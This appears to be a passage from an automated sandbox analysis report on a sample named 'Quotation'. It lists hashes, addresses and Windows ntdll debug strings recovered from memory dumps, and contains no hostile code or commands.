                                                              • Opcode Fuzzy Hash: e048cabef49cbfea084cf6dbe19f51e00759185180fd415c2468d5da1c26cb3d
                                                              • Instruction Fuzzy Hash: 10900271F0540C02D190719C4415746080557D0302F55C012A0024A14D87558B5976A1
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                               • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f8d56be293e38a9e52faa55fd0858790629419619b07506354169d37f8e33e5c
                                                              • Instruction ID: e1acf182a547e951232845801a0e4280b3bcf0b90ef6a5ce0d8ff7a98467e2c6
                                                              • Opcode Fuzzy Hash: f8d56be293e38a9e52faa55fd0858790629419619b07506354169d37f8e33e5c
                                                              • Instruction Fuzzy Hash: FF900271B0140C02D144719C4805686080557D0302F55C012A6024A15E966589957131
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                               • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bda75c600b6f3f62d3352ff1e71548915ce43a02dd556b527c9657ec258788ca
                                                              • Instruction ID: f8f87b062de00ffc2ceaf5dd6c9d5ce30bb39702e27122773ed5bb0d4c046aef
                                                              • Opcode Fuzzy Hash: bda75c600b6f3f62d3352ff1e71548915ce43a02dd556b527c9657ec258788ca
                                                              • Instruction Fuzzy Hash: E5900275B21404020185B59C060550B0C4567D6352395C016F1416950CC62189695321
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                               • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1921b1267293a29aa90c03c16547396cc494b56eae89a3e30e879d26f74538e0
                                                              • Instruction ID: 5b064fb184baa3f7caeb04bea6e0c4ec673ee372e2f807bfaa2d2d9940ef24d5
                                                              • Opcode Fuzzy Hash: 1921b1267293a29aa90c03c16547396cc494b56eae89a3e30e879d26f74538e0
                                                              • Instruction Fuzzy Hash: F49002F1B01544924540B29C8405B0A4D0557E0202B55C017E1054920CC52589559135
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                               • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5a2ba17ae7283d055819717d55f572dd0083aab817a3585d88f6d5991973df81
                                                              • Instruction ID: 31f57ab211409b1eb6e53a28089d478c841edf62d313701506116a80c408fe08
                                                              • Opcode Fuzzy Hash: 5a2ba17ae7283d055819717d55f572dd0083aab817a3585d88f6d5991973df81
                                                              • Instruction Fuzzy Hash: 8F900271B4545502D190719C4405616480577E0202F55C022A0814954D855589596221
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                               • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c2ae42c83f82456d2de8a8bbe050e77fae7f520f1c96a5347a474c3a533963d8
                                                              • Instruction ID: cf0b45d1dcafb6c90cd9d83f6d4736fd46a0dcc1d7aa617bafd925972249b963
                                                              • Opcode Fuzzy Hash: c2ae42c83f82456d2de8a8bbe050e77fae7f520f1c96a5347a474c3a533963d8
                                                              • Instruction Fuzzy Hash: 5D900271B0180802D140719C4809747080557D0303F55C012A5164915E8665C9956531
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                               • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1604cca2702ef88d698a3da435ad103c6a7d3861b036e92d5041a8e6e5d93903
                                                              • Instruction ID: d0e23d5fb753c30723b59102faa25946a9e290f8f0a690a6bd89f1524acd4552
                                                              • Opcode Fuzzy Hash: 1604cca2702ef88d698a3da435ad103c6a7d3861b036e92d5041a8e6e5d93903
                                                              • Instruction Fuzzy Hash: 959002B1B1140442D144719C4405706084557E1202F55C013A2154914CC5298D655125
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                               • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                              • API String ID: 48624451-2108815105
                                                              • Opcode ID: ab53b0510fc739dab6e53855ee4d7b3cce0681af8b24690ba0ca4ed242e18774
                                                              • Instruction ID: 230a311b33bda53fb8cdd61267c88a60d9eaa09e29342b2f7760c0b7f9ea8221
                                                              • Opcode Fuzzy Hash: ab53b0510fc739dab6e53855ee4d7b3cce0681af8b24690ba0ca4ed242e18774
                                                              • Instruction Fuzzy Hash: 3551E7B6A0025AAFEF50DF98C9809BEF7BCBB08244754C569E4A4D7641D638DE108BE0
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                               • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID: HEAP:
                                                              • API String ID: 3446177414-2466845122
                                                              • Opcode ID: a14c1cdcb90682f105f40097931ccf27984e9619513408cda30cf60cec01aa6c
                                                              • Instruction ID: 6f7ad6b7968fe82ac7789e4bbabf402a2090d7ff90671d3e63de8027f548d240
                                                              • Opcode Fuzzy Hash: a14c1cdcb90682f105f40097931ccf27984e9619513408cda30cf60cec01aa6c
                                                              • Instruction Fuzzy Hash: F5A1A179A14312CFDB04CE18C890A5ABBE5FF88750F894A6DE945DB350EB30DC46CB91
                                                              Strings
                                                              • Execute=1, xrefs: 33EC4713
                                                              • ExecuteOptions, xrefs: 33EC46A0
                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 33EC4655
                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 33EC4787
                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 33EC4725
                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 33EC4742
                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 33EC46FC
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                               • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                              • API String ID: 0-484625025
                                                              • Opcode ID: a2ec7b62abc8574f82613003a46b356b1d42241fe84fe66e30bc563cbeb3f0f6
                                                              • Instruction ID: e2ebe2daf65bf6c65630c0ebf5022e0b7c7bf30a255c5ac1684ec9ea73285d00
                                                              • Opcode Fuzzy Hash: a2ec7b62abc8574f82613003a46b356b1d42241fe84fe66e30bc563cbeb3f0f6
                                                              • Instruction Fuzzy Hash: 66514675E0132CAEEB11DFA4DC95FEE33B8AF44714F4400A9E509AB180EB719A42EF50
                                                              Strings
                                                              • RtlpFindActivationContextSection_CheckParameters, xrefs: 33EB79D0, 33EB79F5
                                                              • SsHd, xrefs: 33E6A3E4
                                                              • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 33EB79D5
                                                              • Actx , xrefs: 33EB7A0C, 33EB7A73
                                                              • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 33EB7AE6
                                                              • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 33EB79FA
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                               • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                              • API String ID: 0-1988757188
                                                              • Opcode ID: dddecfc0147d02f505a6840560af8e6e55277ba13f387e2874307e48fce6cc7c
                                                              • Instruction ID: 33eac7aa978c47b2b4d43482029ffc036e17035ad4e689492976a100561b0e72
                                                              • Opcode Fuzzy Hash: dddecfc0147d02f505a6840560af8e6e55277ba13f387e2874307e48fce6cc7c
                                                              • Instruction Fuzzy Hash: 0DE19EB4B483018FEB11CE24C894B1AB7F5AF8435CF584A2DF8A5CB691DB31E9458B91
                                                              APIs
                                                              Strings
                                                              • GsHd, xrefs: 33E6D874
                                                              • RtlpFindActivationContextSection_CheckParameters, xrefs: 33EB9341, 33EB9366
                                                              • RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 33EB9565
                                                              • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 33EB9346
                                                              • Actx , xrefs: 33EB9508
                                                              • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 33EB936B
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                               • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                              • API String ID: 3446177414-2196497285
                                                              • Opcode ID: fef7fa235eec3fadb0d051a46afce94910572695cbbc532907e634523886acbe
                                                              • Instruction ID: 1ff40aa3d3fc3377d0235acc374ee50ea66f7a676eb9658bf25b2c24fa085a2a
                                                              • Opcode Fuzzy Hash: fef7fa235eec3fadb0d051a46afce94910572695cbbc532907e634523886acbe
                                                              • Instruction Fuzzy Hash: F4E17F746483428FEB11CF54C880B5BB7F4BB8835CF884A6DF8959B291D771E944CB52
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                               • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                              • API String ID: 3446177414-1745908468
                                                              • Opcode ID: 9c738e82e5ed6d395611a5a041b80f9052f1165154dac1d29a454c2f434d3e27
                                                              • Instruction ID: 875e6612806fc78686b820125583594dcb9dd287ece60e11632ae6b02c5d84b4
                                                              • Opcode Fuzzy Hash: 9c738e82e5ed6d395611a5a041b80f9052f1165154dac1d29a454c2f434d3e27
                                                              • Instruction Fuzzy Hash: 6C913035900785DFDB01CFA8C440AADFBF1FF49318F5A8159E494AB7A2CBB29842CB50
                                                              APIs
                                                              • RtlDebugPrintTimes.NTDLL ref: 33E4656C
                                                                • Part of subcall function 33E465B5: RtlDebugPrintTimes.NTDLL ref: 33E46664
                                                                • Part of subcall function 33E465B5: RtlDebugPrintTimes.NTDLL ref: 33E466AF
                                                              Strings
                                                              • Getting the shim engine exports failed with status 0x%08lx, xrefs: 33EA9A01
                                                              • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 33EA99ED
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 33EA9A11, 33EA9A3A
                                                              • LdrpInitShimEngine, xrefs: 33EA99F4, 33EA9A07, 33EA9A30
                                                              • apphelp.dll, xrefs: 33E46496
                                                              • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 33EA9A2A
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                               • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 3446177414-204845295
                                                              • Opcode ID: 1e42d120366784e4be7f39fe9fc7d279d86c3832c072248890204a353e3954ae
                                                              • Instruction ID: eb0cce1e4eafb4b01abfee2010d8b61f35cd886a461b4b8a6ada3a18b7e2274b
                                                              • Opcode Fuzzy Hash: 1e42d120366784e4be7f39fe9fc7d279d86c3832c072248890204a353e3954ae
                                                              • Instruction Fuzzy Hash: 4651D2716183049FE720DF24D890B9B77E8FF88754F84491AF5D5AB261DB30E904CB92
                                                              APIs
                                                              Strings
                                                              • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 33EA9AF6
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 33EA9AC5, 33EA9B06
                                                              • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 33EA9AB4
                                                              • LdrpLoadShimEngine, xrefs: 33EA9ABB, 33EA9AFC
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 3446177414-3589223738
                                                              • Opcode ID: 9353bf897467db6c964def2aefe8d25da88700678201c0d1197ba1fa7b129f26
                                                              • Instruction ID: 82d79be81a51a424fd72d9fa148b6a74a9b987599c5643a0b212991395d5ff43
                                                              • Opcode Fuzzy Hash: 9353bf897467db6c964def2aefe8d25da88700678201c0d1197ba1fa7b129f26
                                                              • Instruction Fuzzy Hash: 5A512436B113589FDB04EBA8C854A9D77F6BB54308F88016AE450FF696DB709C45CB90
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                                                              • API String ID: 3446177414-3224558752
                                                              • Opcode ID: d14886e77ea08fbeb842d3604482e5688ff374b65682adf41c010880bcec3626
                                                              • Instruction ID: acd118fcebf91581eab568ee286190a461ad2159e3f0b3743ceba77e550d3a17
                                                              • Opcode Fuzzy Hash: d14886e77ea08fbeb842d3604482e5688ff374b65682adf41c010880bcec3626
                                                              • Instruction Fuzzy Hash: 72419975A14744EFEB02DFA4C498B5AB7F4EF04368F0482A9E85197791CB34E882CBD1
                                                              APIs
                                                              Strings
                                                              • Entry Heap Size , xrefs: 33EFF26D
                                                              • ---------------------------------------, xrefs: 33EFF279
                                                              • Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 33EFF263
                                                              • HEAP: , xrefs: 33EFF15D
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
                                                              • API String ID: 3446177414-1102453626
                                                              • Opcode ID: 14d7a58068059a7685fe2fac237d522686431fa40d2013c45eea8e50926ec0f9
                                                              • Instruction ID: fbdc820100f41cb6064123b10a97d5af582c3b31f04248204f41a1aace8aae17
                                                              • Opcode Fuzzy Hash: 14d7a58068059a7685fe2fac237d522686431fa40d2013c45eea8e50926ec0f9
                                                              • Instruction Fuzzy Hash: 2441BC79A00615DFD704EF58C59090ABBF5FF8935876A82A9D408AB311D772EC43CB80
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                                                              • API String ID: 3446177414-1222099010
                                                              • Opcode ID: 05e75a19e3f9f1f8c50a32ec88e576fe84409a6ba9e0fecc6b9c1cbf1ce37186
                                                              • Instruction ID: 7fc5098a0ec421fc59361107a04ce2715909be48eba280b1a3427dbfe3f75bc4
                                                              • Opcode Fuzzy Hash: 05e75a19e3f9f1f8c50a32ec88e576fe84409a6ba9e0fecc6b9c1cbf1ce37186
                                                              • Instruction Fuzzy Hash: 6E315635529BD4EFE712DBA4C808B467BF8EF01754F084184E49197B92CBB8E882CB61
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: __aulldvrm
                                                              • String ID: +$-$0$0
                                                              • API String ID: 1302938615-699404926
                                                              • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                              • Instruction ID: 3f8faf1f79531c4e0e9e3037f51427a72fd5f463eb2c9f4668a43c3ce963660a
                                                              • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                              • Instruction Fuzzy Hash: 2C81C078E1534B9EFF148F68C8907EEBBB6AF49358F58425AD850A7391CB389840CB50
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID: $$@
                                                              • API String ID: 3446177414-1194432280
                                                              • Opcode ID: d585741035466c8863c769e9ef1ab45dfa2605a0b79e576645c78cdbc63801a7
                                                              • Instruction ID: b235525769388966c84bcc548102c7fd6a86ddc11c54a53c65064539ff745ed3
                                                              • Opcode Fuzzy Hash: d585741035466c8863c769e9ef1ab45dfa2605a0b79e576645c78cdbc63801a7
                                                              • Instruction Fuzzy Hash: 8A8139B5D003699BDB22CB54CD44BDEB7B8AF08754F0441EAE919B7680E7309E85CFA0
                                                              Strings
                                                              • TG3, xrefs: 33E72462
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 33EBA9A2
                                                              • LdrpDynamicShimModule, xrefs: 33EBA998
                                                              • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 33EBA992
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
                                                              • Associated: 00000003.00000002.2614754852.0000000033F49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000003.00000002.2614754852.0000000033FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_33e20000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$TG3$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-896535992
                                                              • Opcode ID: 6c1212795cb4e4b988eb844778c52162204674514104435bba67fc16a7d774ce
                                                              • Instruction ID: 14990bdcf6f8d8b747e5e9d4b85f8d90e64a2ae35a72999c4bd2e6c2f0372e5a
                                                              • Opcode Fuzzy Hash: 6c1212795cb4e4b988eb844778c52162204674514104435bba67fc16a7d774ce
                                                              • Instruction Fuzzy Hash: 4A312D75A04301EFEF11AF58C950A5ABBF4FF94754F99005AF450B7251DB709982CBD0
                                                              Strings
                                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 33EC02E7
                                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 33EC02BD
                                                              • RTL: Re-Waiting, xrefs: 33EC031E
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2614754852.0000000033E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E20000, based on PE: true
